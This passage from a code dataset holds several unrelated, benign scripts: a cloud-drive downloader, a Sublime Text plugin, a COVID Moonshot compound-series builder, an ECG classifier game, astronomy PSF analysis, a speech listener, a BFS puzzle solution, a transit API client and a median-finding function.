config set date=?, current_size=? where date=?'\n            arg = (time.strftime('%c'), config[4] - file_info[2], config[0])\n            cur.execute(query, arg)\n            con.commit()\n        logger.info('delete complete')\n    else:\n        logger.info('download start')\n        # file select from remote loop\n        while True:\n            acdcli.sync()\n            logger.info('acdcli sync')\n            ret = acdcli.ls(remote)\n            logger.info('acdcli ls')\n            file_info = acdcli.parsing(random.choice(ret))\n            logger.info('choice random file')\n            with sqlite3.connect(db_path) as con:\n                cur = con.cursor()\n                cur.execute('begin exclusive')\n                query = 'select * from files where hash=?'\n                record = cur.execute(query, (file_info[0],)).fetchone()\n                if not record:\n                    query = 'insert into files values (?, ?, ?, ?)'\n                    cur.execute(query, file_info + ('incomplete',))\n                    con.commit()\n                    break\n        # after select\n        logger.info('select, ' + file_info[1])\n        acdcli.sync()\n        acdcli.download(remote + '/' + file_info[1], local + '/')\n        logger.info('acdcli download')\n        with sqlite3.connect(db_path) as con:\n            cur = con.cursor()\n            cur.execute('begin exclusive')\n            query = 'update files set status=? where hash=?'\n            cur.execute(query, ('complete', file_info[0]))\n            query = 'select * from config'\n            config = cur.execute(query).fetchone()\n            query = 'update config set date=?, current_size=? 
where date=?'\n arg = (time.strftime('%c'), config[4] + file_info[2], config[0])\n cur.execute(query, arg)\n con.commit()\n logger.info('download complete')\n logger.info('-----end-----')\nexcept Exception as e:\n logger.info(e)\n","sub_path":"downloader/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"474316359","text":"import os\nimport sublime\nimport sublime_plugin\n\nclass SplitPaneCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tw = self.window\n\t\tif w.num_groups() == 1:\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 0.85, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n\t\t\t})\n\t\t\tw.focus_group(1)\n\t\t\tfilename = os.path.expanduser(\"~/todo\")\n\t\t\tw.open_file(filename)\n\t\t\tsublime.status_message(\"Opening file \" + filename)\t\n\t\t\tactiveView = w.active_view()\n\t\t\tactiveView.set_syntax_file(\"Packages/MarkdownEditing/Markdown.tmLanguage\")\n\t\t\tactiveSettings = activeView.settings()\n\t\t\tactiveSettings.set('gutter', False)\n\t\t\tactiveSettings.set('word_wrap', 'auto')\n\t\t\tactiveSettings.set('wrap_width', 0)\n\t\t\tactiveSettings.set('color_scheme', \"Packages/MarkdownEditing/MarkdownEditor-Dark.tmTheme\")\n\t\telse:\n\t\t\tw.focus_group(1)\n\t\t\tw.run_command('close')\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1]]\n\t\t\t})\n\nclass ExpandRightPanelCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tw = self.window\n\t\tif w.num_groups() == 2:\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 0.5, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n\t\t\t})\n\nclass ExpandRightPanelFurtherCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tw = self.window\n\t\tif w.num_groups() == 2:\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 0.25, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n\t\t\t})","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174353930","text":"#!/bin/env python\n\n\"\"\"\nCreate fah-xchem compound set JSON for Sprint 5 file using new schema\n\nDO NOT USE - it uses the compounds SDF 2D file which may screw up stereochemistryx\n\"\"\"\n\nimport numpy as np\nimport json\nimport math\nimport itertools\nimport datetime\nfrom rich.progress import track\nfrom openeye import oechem\n\nxchem_project = 'Mpro'\ncreator = 'John Chodera '\nff = 'openff-1.3.0'\ncreation_date = datetime.datetime.now() \n\nxchem_fragment_id = 'x11498'\nreference_compound_id = 'MAT-POS-b3e365b9-1'\n\n#xchem_fragment_id = 'x12073'\n#reference_compound_id = 'MAT-POS-8a69d52e-7'\n\n# monomer\nseries_name = f'sprint-5-stereofix-{xchem_fragment_id}-monomer-neutral'\ndescription = f\"COVID Moonshot Sprint 5 to prioritize benzopyran-isoquinoline series based on {xchem_fragment_id} ({reference_compound_id}) to optimize substituents in the P1' pocket with Mpro monomer and neutral Cys145:His41\"\n\n# dimer\nseries_name = f'sprint-5-stereofix-{xchem_fragment_id}-dimer-neutral'\ndescription = f\"COVID Moonshot Sprint 5 to prioritize benzopyran-isoquinoline series based on {xchem_fragment_id} ({reference_compound_id}) to optimize substituents in the P1' pocket with 
Mpro dimer and neutral Cys145:His41\"\n\njson_filename = f'json/{series_name}.json' # output filename\nmicrostates_sdf_filename = f'docked/sprint-5-microstates-{xchem_fragment_id}-sorted.sdf' # microstates with docked geometries\ncompounds_sdf_filename = f'docked/sprint-5-compounds.sdf' # compounds with annotation\nsmarts = 'C(=O)Nc1cncc2ccccc12' # SMARTS for common core scaffold : linker:isoquinoline\nreceptors = f'../receptors/monomer/Mpro-{xchem_fragment_id}_0_bound-protein-thiolate.pdb'\nreceptor_variant = {'catalytic-dyad' : 'His41(0) Cys145(0)'}\ntemperature = 300.0 # kelvin\npH = 7.3 # pH (fluorescence assay)\nionic_strength_millimolar = 70.0 # millimolar\nreference_microstate_id = f'{reference_compound_id}_1' # microstate id for reference for transformations\n\ndef get_compound_id(microstate_id):\n    \"\"\"\n    Extract the compound ID from a microstate ID (which includes a wart suffix like '_1', '_2')\n\n    Parameters\n    ----------\n    microstate_id : str\n        The microstate ID, which includes a wart suffix (e.g. 'MAT-POS-8a69d52e-7_1')\n\n    Returns\n    -------\n    compound_id : str\n        The compound ID with the wart removed (e.g. 'MAT-POS-8a69d52e-7')\n    \"\"\"\n    import re\n    match = re.match('^(?P<compound_id>\S+)_(?P<wart>\d+)$', microstate_id)\n    if match is None:\n        # No warts; compound and microstate are identical\n        compound_id = microstate_id\n    else:\n        # Remove the wart\n        compound_id = match.group('compound_id')\n    return compound_id\n\n# Project pair\nfrom fah_xchem.schema import ProjectPair\nfah_projects = ProjectPair(\n    #complex_phase=13438, # monomer complex\n    #solvent_phase=13439 # monomer solvent\n    complex_phase=13440, # dimer complex\n    solvent_phase=13441 # dimer solvent\n)\n\n# Compound series metadata\nfrom fah_xchem.schema import CompoundSeriesMetadata\nseries_metadata = CompoundSeriesMetadata(\n    name=series_name,\n    description=description,\n    creator=creator,\n    created_at=creation_date,\n    xchem_project=xchem_project,\n    receptor_variant=receptor_variant,\n    temperature_kelvin=temperature,\n    ionic_strength_millimolar=ionic_strength_millimolar,\n    pH=pH,\n    fah_projects=fah_projects\n)\n\n# Compounds\nfrom openforcefield.topology import Molecule\nfrom fah_xchem.schema import Compound, CompoundMetadata\nfrom openeye import oechem\n\nprint('Processing compounds...')\ncompounds = dict()\nwith oechem.oemolistream(compounds_sdf_filename) as ifs:\n    for oemol in ifs.GetOEGraphMols():\n        # Set ID and SMILES\n        compound_id = oemol.GetTitle()\n        #smiles = Molecule.from_openeye(oemol, allow_undefined_stereo=True).to_smiles()\n        smiles = oechem.OEMolToSmiles(oemol)\n        # Extract experimental data, if present\n        experimental_data = dict()\n        if oechem.OEHasSDData(oemol,'f_avg_pIC50'):\n            pIC50 = oechem.OEGetSDData(oemol, 'f_avg_pIC50')\n            if pIC50 != '':\n                pIC50 = float(pIC50)\n                experimental_data['pIC50'] = pIC50\n        # Extract information about the compound\n        compound_metadata = CompoundMetadata(\n            compound_id=compound_id,\n            smiles=smiles,\n            experimental_data=experimental_data,\n        )\n        # Create new compound\n        compound = Compound(\n            metadata=compound_metadata,\n            microstates=list()\n        )\n        # Store compound\n        compounds[compound_id] = compound\n\n# Microstates\nprint('Processing microstates...')\nfrom fah_xchem.schema import CompoundMicrostate, Microstate\nmicrostates = list()\nwith oechem.oemolistream(microstates_sdf_filename) as ifs:\n    for oemol in ifs.GetOEGraphMols():\n        microstate_id = oemol.GetTitle()\n        #smiles = Molecule.from_openeye(oemol, allow_undefined_stereo=True).to_smiles()\n        smiles = oechem.OEMolToSmiles(oemol)\n        # 
Determine if our molecule has warts\n compound_id = oechem.OEGetSDData(oemol, 'compound')\n # Compile information about the microstate\n microstate = Microstate(microstate_id=microstate_id, smiles=smiles)\n microstates.append(microstate)\n # Add microstate to compound if it already exists\n compound_microstates = list() # previous compound microstates\n if not compound_id in compounds:\n raise Exception(f'Microstate {microstate_id} supposedly belongs to compound {compound_id}, but compound not found')\n compound = compounds[compound_id]\n compound = Compound(\n metadata=compound.metadata,\n microstates=compound.microstates + [microstate]\n )\n # Store compound\n compounds[compound_id] = compound\n\n# Find reference molecule index for transformations\nprint(f'Identifying reference microstate {reference_microstate_id} for transformations...')\nreference_microstate = None\nfor reference_microstate_index, microstate in enumerate(microstates):\n if microstate.microstate_id == reference_microstate_id:\n reference_microstate = microstate\nif reference_microstate is None:\n raise Exception(f'Could not find reference microstate id {reference_microstate_id} among microstates')\nprint(f'Reference microstate is ligand index {reference_microstate_index}')\nprint(reference_microstate)\n\n# Create transformations\nfrom fah_xchem.schema import Transformation, CompoundMicrostate\nrun_id = 0\ntransformations = list()\nprint('Creating transformations to reference microstate...')\nfor microstate_index, microstate in enumerate(microstates):\n # Skip the self-transformation\n if microstate_index == reference_microstate_index:\n continue\n\n # Create the transformation\n transformation = Transformation(\n run_id=run_id,\n xchem_fragment_id=xchem_fragment_id,\n initial_microstate=CompoundMicrostate(\n compound_id=get_compound_id(reference_microstate.microstate_id),\n microstate_id=reference_microstate.microstate_id\n ),\n final_microstate=CompoundMicrostate(\n compound_id=get_compound_id(microstate.microstate_id),\n microstate_id=microstate.microstate_id\n )\n )\n transformations.append(transformation)\n run_id += 1\n\n# Compile compound series\nfrom fah_xchem.schema import CompoundSeries\ncompound_series = CompoundSeries(\n metadata=series_metadata,\n compounds=list(compounds.values()),\n transformations=transformations\n)\n\n# Write JSON\nprint(f'Writing JSON to {json_filename}')\nif '.bz2' in json_filename:\n import bz2\n with bz2.open(json_filename, \"wt\") as f:\n f.write(compound_series.json())\nelif '.gz' in json_filename:\n import gzip\n with gzip.open(json_filename, \"wt\") as f:\n f.write(compound_series.json())\nelse:\n with open(json_filename, \"wt\") as f:\n f.write(compound_series.json())\n","sub_path":"synthetic-enumeration/sprint-5-stereofix/04-create-json.py","file_name":"04-create-json.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"232956479","text":"import numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom keras.layers import Input, Dense, Activation, BatchNormalization, Flatten, Conv1D\r\nfrom keras.layers import MaxPooling1D, Dropout\r\nfrom keras.models import Model\r\nimport keras.backend as K\r\n\r\nK.set_image_data_format('channels_last')\r\nlabEnc = LabelEncoder()\r\n\r\ndef cnnOverlap(input_shape):\r\n \"\"\"\r\n adding overlap in the conv layers, with batchnorm and dropouts\r\n \r\n Arguments:\r\n input_shape -- shape of the 
images of the dataset\r\n\r\n Returns:\r\n model -- a Model() instance in Keras\r\n \"\"\"\r\n # Define the input placeholder as a tensor with shape input_shape. Think of this as your input image!\r\n X_input = Input(input_shape)\r\n\r\n # CONV -> BN -> RELU Block applied to X\r\n X = Conv1D(16, 8, strides=4, name = 'conv0')(X_input)\r\n X = BatchNormalization(name = 'bn0')(X)\r\n X = MaxPooling1D(2, name='max_pool')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.1)(X)\r\n X = Conv1D(32, 4, strides=2, name = 'conv1')(X)\r\n X = BatchNormalization(name = 'bn1')(X)\r\n X = MaxPooling1D(2, name='max_pool1')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.2)(X)\r\n X = Conv1D(64, 4, strides=2, name = 'conv2')(X)\r\n X = BatchNormalization(name = 'bn2')(X)\r\n X = MaxPooling1D(2, name='max_pool2')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.3)(X)\r\n X = Conv1D(64, 4, strides=2, name = 'conv3')(X)\r\n X = BatchNormalization(name = 'bn3')(X)\r\n X = MaxPooling1D(2, name='max_pool3')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.15)(X)\r\n # FLATTEN X (means convert it to a vector) + FULLYCONNECTED\r\n X = Flatten()(X)\r\n X = Dense(3, activation='softmax', name='fc')(X)\r\n\r\n # Create model. This creates your Keras model instance, you'll use this instance to train/test the model.\r\n model = Model(inputs = X_input, outputs = X, name='derp')\r\n return model\r\n\r\ndirName = 'training2017/'\r\nxVal = np.load(dirName + 'test.npy')\r\nyVal = np.load(dirName + 'testlabel.npy')\r\nyVal=yVal[:,1]\r\nlabels=labEnc.fit(yVal).classes_\r\n\r\navg, std = np.load('models/normParamsSemifinal.npy')\r\nclf = cnnOverlap((4096,1))\r\nclf.load_weights('models/cnnSemifinal')\r\n\r\ndef plotECG(x):\r\n plt.subplot(211)\r\n plt.plot(x[:2048])\r\n plt.subplot(212)\r\n plt.plot(x[2048:])\r\n plt.show()\r\n\r\ndef makePred(x):\r\n x = (x-avg)/std\r\n preds = clf.predict(x.reshape(*x.shape,1))\r\n return preds\r\n\r\ndef miniGame(idx=None):\r\n if idx==None:\r\n idx=np.random.randint(0,len(xVal))\r\n if idx >= len(xVal):\r\n return None\r\n x=xVal[idx]\r\n plotECG(x)\r\n guess=input('What do you think this is?\\n')\r\n print('\\nYour guess is ' + guess + '\\n')\r\n preds=makePred(x.reshape(1,-1))\r\n print('The computer estimates:')\r\n print(labels)\r\n print(preds[0])\r\n print(\"\\nThe computer's guess is {}\".format(labels[np.argmax(preds)]))\r\n print(\"The correct answer is \" + yVal[idx])","sub_path":"src/cnn pipe/4_minigame.py","file_name":"4_minigame.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"626429988","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 13 16:05:33 2018\n\nCode to look at psf data of individual quadrants\n\n@author: ppxee\n\"\"\"\n\n\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\n#from astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nfrom photutils import CircularAperture, aperture_photometry\nfrom astropy.coordinates import match_coordinates_sky\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nplt.close('all') #close any open plots\n\ndef radial_profile(data, center):\n y, x = np.indices((data.shape)) #create coordinate grid\n r = np.sqrt((x - 
center[0])**2 + (y - center[1])**2) #get radius values for grid\n r = r.astype(np.int)\n\n tbin = np.bincount(r.ravel(), data.ravel()) # counts number of times value\n # of radius occurs in the psf\n # weighted by the data\n nr = np.bincount(r.ravel()) # counts number of radii values in psf\n radialprofile = tbin / nr # as weighted is r*data then get profile by \n # dividing by unweighted counts of r values.\n return radialprofile \n\ndef get_psf(sem):\n return fits.getdata('PSFs/'+sem+'_K_PSF.fits')\n\ndef quadrants(initdata,sem):\n \n ira = initdata['X_IMAGE_'+sem]\n idec = initdata['Y_IMAGE_'+sem]\n\n ### define bounds of quadrants ###\n midra = 12450\n middec = 13310\n \n ### create masks for quadrant ###\n mask1 = ira < midra\n mask2 = idec >= middec\n quad1data = initdata[mask1*mask2]\n \n mask1 = ira >= midra\n mask2 = idec >= middec\n quad2data = initdata[mask1*mask2]\n \n mask1 = ira < midra\n mask2 = idec < middec\n quad3data = initdata[mask1*mask2]\n \n mask1 = ira >= midra\n mask2 = idec < middec\n quad4data = initdata[mask1*mask2]\n \n \n return quad1data, quad2data, quad3data, quad4data\n\ndef get_avg_flux(tbdata):\n flux = vari_funcs.hflux4_stacks(tbdata)\n flux = vari_funcs.normalise_flux(flux)\n return np.nanmedian(flux, axis=0)\n\ndef psf_and_profile(quad, sem):\n centre = [29,29]\n psf = fits.getdata('PSFs/H/Quad_PSFs/cleaned_Kstars_'+sem+'_'+str(quad)+'_H_PSF.fits')\n# if sem == '10B':\n# psf = fits.getdata('PSFs/Quad_PSFs/'+sem+'_'+str(quad)+'_K_PSF.fits')\n# else:\n# psf = fits.getdata('PSFs/Quad_PSFs/extraq_'+sem+'_'+str(quad)+'_K_PSF.fits')\n\n rp = vari_funcs.radial_profile(psf, centre)\n return psf, rp, np.sqrt(rp)\n\nsemesters = ['06B', '07B', '08B', '09B', '10B', '11B', '12B']\nhdr08B = fits.getheader('Images/UDS-DR11-K.mef.fits') # random year (same in all)\nconst = -hdr08B['CD1_1'] # constant that defines unit conversion for FWHM\nr = np.arange(0,42,1) * const * 3600 #define radius values\ncentre = [29,29]\n\npsf_data = fits.open('UDS_catalogues/DR11_stars_for_PSFs.fits')[1].data\nsdata = fits.open('mag_flux_tables/H/stars_mag_flux_table_H_cleaned.fits')[1].data\n#set up time variable for plot\nt = np.linspace(2, 8, num=7)\n\nfor n, sem in enumerate(semesters):### Define coordinates ###\n \n refcoord = SkyCoord(psf_data['ALPHA_J2000_1']*u.degree, psf_data['DELTA_J2000_1']*u.degree)\n semcoord = SkyCoord(sdata['ALPHA_J2000_'+sem]*u.degree, sdata['DELTA_J2000_'+sem]*u.degree)\n \n ### Match catalogues and create new table ###\n idx, d2d , _ = match_coordinates_sky(refcoord, semcoord) #match these 'good' stars to create table\n\n if sem == '06B':\n ids = sdata['NUMBER_06B'][idx]\n else:\n ids = np.intersect1d(ids, sdata['NUMBER_06B'][idx])\n\nmask = np.isin(sdata['NUMBER_06B'], ids)\ntempsdata = sdata[mask] \nprint(len(tempsdata['MAG_APER_'+sem][:,4]))\nsquad1data, squad2data, squad3data, squad4data = quadrants(tempsdata,'06B')\n\n### get average FWHM ###\navgFWHM1 = np.zeros(len(semesters))\navgFWHM2 = np.zeros(len(semesters))\navgFWHM3 = np.zeros(len(semesters))\navgFWHM4 = np.zeros(len(semesters))\nfor n, sem in enumerate(semesters):\n avgFWHM1[n] = np.nanmedian(squad1data['FWHM_WORLD_'+sem]) * 3600\n avgFWHM2[n] = np.nanmedian(squad2data['FWHM_WORLD_'+sem]) * 3600\n avgFWHM3[n] = np.nanmedian(squad3data['FWHM_WORLD_'+sem]) * 3600\n avgFWHM4[n] = np.nanmedian(squad4data['FWHM_WORLD_'+sem]) * 3600\n\n### get average flux ### \navgflux1 = get_avg_flux(squad1data)\navgflux2 = get_avg_flux(squad2data)\navgflux3 = get_avg_flux(squad3data)\navgflux4 = 
get_avg_flux(squad4data)\n\n## get psfs, aper flux, and profiles ###\npixelr = (1.5/3600) / const\naperture = CircularAperture(centre, pixelr)\nsmallaperture = CircularAperture(centre, pixelr)\npsf = {}\nrp = {}\nsqrtrp = {}\naperflux = {1:np.empty(len(semesters)),\n 2:np.empty(len(semesters)),\n 3:np.empty(len(semesters)),\n 4:np.empty(len(semesters))}\nfor m, sem in enumerate(semesters):\n psf[sem] = {}\n rp[sem] = {}\n sqrtrp[sem] ={}\n for n in [1,2,3,4]:\n psf[sem][n], rp[sem][n], sqrtrp[sem][n] = psf_and_profile(n,sem)\n ### Determine flux within 3 arcsec apertures ###\n phot = aperture_photometry(psf[sem][n], aperture)\n aperflux[n][m] = phot['aperture_sum'][0]\n ### Plot the psfs ###\n plt.figure(m+5)\n plt.subplot(2,2,n)\n plt.imshow(np.log(psf[sem][n]), vmax=-4.0, vmin=-20)\n vari_funcs.no_ticks()\n plt.title(sem+str(n))\n# print(np.nanmin(np.log(psf[sem][n])))\n \n### Plot FWHM curves ###\nplt.figure(1, figsize=[9,6])\nplt.subplot(221)\nplt.plot(t,avgFWHM1,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\n\nplt.subplot(222)\nplt.plot(t,avgFWHM2,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\n\nplt.subplot(223)\nplt.plot(t,avgFWHM3,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\n\nplt.subplot(224)\nplt.plot(t,avgFWHM4,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\nplt.tight_layout()\n\n### Plot median flux curves ###\nplt.figure(2, figsize=[9,6])\nplt.subplot(221)\nplt.plot(t,avgflux1,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\n\nplt.subplot(222)\nplt.plot(t,avgflux2,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\n\nplt.subplot(223)\nplt.plot(t,avgflux3,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\n\nplt.subplot(224)\nplt.plot(t,avgflux4,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\nplt.tight_layout()\n\n### Plot radial profiles ###\nplt.figure(3, figsize=[12,9])\nfor sem in sqrtrp:\n for n in sqrtrp[sem]:\n plt.subplot(2,2,n)\n plt.plot(r, sqrtrp[sem][n], label=sem)\n plt.xlabel('Radius (arcsec)')\n plt.ylabel('sqrt(Flux)')\n plt.ylim(ymax=0.16, ymin=0)\n plt.legend()\nplt.tight_layout()\n\n### Plot aper flux curves ###\nplt.figure(4, figsize=[9,6])\nfor n in [1,2,3,4]:\n plt.subplot(2,2,n)\n plt.plot(t,aperflux[n],'o')\n plt.ylabel('Aperture Flux of PSF')\n plt.ylim(ymax=0.96, ymin=0.925)\n plt.xticks(t, semesters)\n plt.xlabel('Semester')\n plt.tight_layout()\n","sub_path":"quadtests_H.py","file_name":"quadtests_H.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"66195359","text":"import os\nfrom pocketsphinx import LiveSpeech, get_model_path\nfile = open(\"ready.st\",\"w\")\t\nfile.write(\"false\")\nfile.close()\n\n\nmodel_path = get_model_path()\nspeech = LiveSpeech(\n verbose=False,\n sampling_rate=16000,\n buffer_size=2048,\n no_search=False,\n full_utt=False,\n hmm=os.path.join(model_path, 'zero_ru.cd_cont_4000'),\n lm=os.path.join(model_path, 'ru.lm'),\n dic=os.path.join(model_path, 'ru.dic'))\nfile = 
open(\"ready.st\",\"w\")\t\nfile.write(\"true\")\nfile.close()\nprint(\"Yes\")\nfor phrase in speech:\n\tprint(phrase)\n\twFile = open(\"vol.txt\",\"w\")\n\twFile.write(str(phrase))\n\twFile.close()\n\n\n\n\n\n\n","sub_path":"TestProject/bin/Debug/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"67212381","text":"import sys; sys.stdin = open('input_data/2206.txt')\nfrom collections import deque\nfrom pprint import pprint\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\nheight, width = map(int, sys.stdin.readline().split())\nGround = [list(map(int, ' '.join(sys.stdin.readline()).split())) for _ in range(height)]\nvisit = [[10000]*width for _ in range(height)]\nQ = deque()\nQ.append([0, 0, False, 1])\nvisit[0][0] = 1\nwhile Q:\n x, y, attack, depth = Q.popleft()\n if depth > visit[height-1][width-1]:\n break\n if [x, y] == [height-1, width-1]:\n result = depth\n visit[x][y] = depth\n depth += 1\n for i in range(4):\n tx = x + dx[i]\n ty = y + dy[i]\n if 0 <= tx < height and 0 <= ty < width:\n visit[tx][ty] = depth\n if not Ground[tx][ty]:\n Q.append([tx, ty, attack, depth])\n elif not attack:\n Q.append([tx, ty, not attack, depth])\npprint(visit)\nif visit[height-1][width-1] == 10000:\n print(-1)\nelse:\n print(visit[height-1][width-1])","sub_path":"김재유/8.완전탐색(DFS &BFS) 2번째/boj_2206_벽부수고이동하기_2트.py","file_name":"boj_2206_벽부수고이동하기_2트.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191288478","text":"#!/usr/bin/env python3\nimport json\nimport hmac\nimport base64\nfrom requests import Request, Session\nfrom requests.auth import AuthBase\nimport requests\nimport hashlib\n\n# debug?\ndebug = 1\n# credentials\napiuser = \"\"\napikey = \"\"\nmystation = \"\"\n\n# variables\nbaseurl = \"http://api-prod.geofox.de\"\nmethods = {\"Init\":\"/gti/public/init\",\\\n \"checkName\":\"/gti/public/checkName\",\\\n \"getRoute\":\"/gti/public/getRoute\",\\\n \"departureList\":\"/gti/public/departureList\",\\\n \"getAnnouncements\":\"/gti/public/getAnnouncements\",\\\n \"getStationInformation\":\"/gti/public/getStationInformation\"}\ns = Session()\n\nclass HVVAuth(AuthBase):\n def __init__(self, payload):\n self.sig = base64.b64encode(hmac.new(apikey.encode(\"UTF-8\"), json.dumps(payload).encode(\"UTF-8\"), hashlib.sha1).digest())\n print(self.sig)\n def __call__(self, request):\n request.headers['geofox-auth-signature'] = self.sig\n request.headers['geofox-auth-user'] = apiuser\n return request\n\ndef make_request(method, payload):\n if debug == 1:\n print(\"> build_request got inputs: {}, {}\".format(method, payload))\n url = baseurl + methods[method]\n headers = {\"Content-Type\":\"application/json\",\"Accept\":\"application/json\"}\n request = Request('POST',\n url,\n headers=headers,\n auth=HVVAuth(payload),\n json=payload).prepare()\n if debug == 1:\n print(\"> the following request was constructed:\")\n pretty_print_POST(request)\n response = s.send(request)\n if debug == 1:\n print(\"> it returned with status code {}:\".format(response.status_code))\n try:\n print(\">> {}\".format(response.text))\n print(\">> {}\\n\".format(json.dumps(response.json)))\n except:\n pass\n\n return response.text\n\ndef pretty_print_POST(req):\n \"\"\"\n At this point it is completely built and ready\n to be fired; it is \"prepared\".\n\n However pay attention at the formatting used in \n this function 
because it is programmed to be pretty \n printed and may differ from the actual request.\n \"\"\"\n print('{}\\n{}\\r\\n{}\\r\\n\\r\\n{}'.format(\n '-----------START-----------',\n req.method + ' ' + req.url,\n '\\r\\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),\n req.body,\n ))\n\nprint(\">>> Started script..\")\nprint(\">>> Running \\\"getAnnouncemts\\\"...\")\nprint(json.dumps(make_request(\"getAnnouncements\",{}), indent=4))\nprint(\">>> Getting name of Station {}...\".format(mystation))\nstation = json.loads(make_request(\"checkName\",{\"theName\":{\"name\":mystation,\"type\":\"STATION\"}}))\nprint(\">>> Getting departures for Station {}...\".format(mystation))\nprint(json.dumps(make_request(\"departureList\",{\"station\":station[\"results\"][0],\"time\":{\"date\":\"10.12.2019\",\"time\":\"12:00\"},\"maxList\":\"20\",\"maxTimeOffset\":60,\"useRealtime\":\"true\"}), indent=4))\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"638053664","text":"class Solution:\r\n def findMedianSortedArrays(self, nums1, nums2):\r\n \"\"\"\r\n 找两个有序数组的中位数\r\n :param nums1:有序数组1\r\n :param nums2:有序数组2\r\n :return:中位数\r\n \"\"\"\r\n # 组合两个列表\r\n # nums = sorted(nums1 + nums2)\r\n nums = []\r\n\r\n # 组合两个列表 成为一个有序的列表\r\n while True:\r\n if len(nums1) > 0 and len(nums2) > 0:\r\n if nums1[0] < nums2[0]:\r\n nums.append(nums1.pop(0))\r\n else:\r\n nums.append(nums2.pop(0))\r\n elif len(nums1) > 0:\r\n nums.append(nums1.pop(0))\r\n elif len(nums2) > 0:\r\n nums.append(nums2.pop(0))\r\n else:\r\n break\r\n\r\n # 奇数\r\n if len(nums) % 2 != 0:\r\n return nums[(len(nums) - 1) // 2]\r\n # 偶数\r\n else:\r\n return (nums[len(nums) // 2] + nums[len(nums) // 2 - 1]) / 2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(Solution().findMedianSortedArrays([1, 3], [2]))\r\n","sub_path":"LeetCode_Python/Test_4_findMedianSortedArrays.py","file_name":"Test_4_findMedianSortedArrays.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"397767859","text":"from django.core.management.base import NoArgsCommand\nfrom django.apps import apps\nfrom django.db.transaction import atomic\n\nfrom ... 
